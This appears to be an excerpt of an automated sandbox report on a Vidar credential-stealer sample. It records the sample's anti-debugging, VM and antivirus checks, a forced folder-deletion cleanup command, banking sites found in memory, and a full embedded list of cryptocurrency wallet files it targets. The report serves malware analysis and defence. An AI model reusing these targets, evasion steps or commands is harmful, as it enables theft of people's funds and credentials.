Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: BFCAAEHJDB.exe, 00000007.00000002.3447891511.0000000001198000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000002.2971561968.0000027B35867000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2915570882.000001E397F6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0041D12F

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402000 VirtualProtect 00000000,00000004,00000100,?

0_2_00402000

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00417A40

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004176E0 mov eax, dword ptr fs:[00000030h]

0_2_004176E0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

0_2_00402000

Enables debug privileges

Source: C:\ProgramData\BFCAAEHJDB.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041ECC8 SetUnhandledExceptionFilter,	0_2_0041ECC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041D12F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041CAF5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C81B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C81B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9CAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C9CAC62
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF620941131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,_malloc_dbg,strlen,_malloc_dbg,_cexit,	23_2_00007FF620941131

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

0_2_0040ED80

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,		0_2_00411400
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004112F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_004112F0

Contains functionality to execute programs as a different user

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

23_2_00007FFDA38CF0FE

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\ProgramData\BFCAAEHJDB.exe "C:\ProgramData\BFCAAEHJDB.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEGIDHDHIDG" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 3212	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 1524 -ip 1524	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1524 -s 1176	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00401000 cpuid

0_2_00401000

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_0040FC30

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041A440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_0041A440

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040FAE0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_0040FAE0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_0040FBC0

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.3.file.exe.40d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.40d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.40a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.40a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2761033099.0000000000530000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
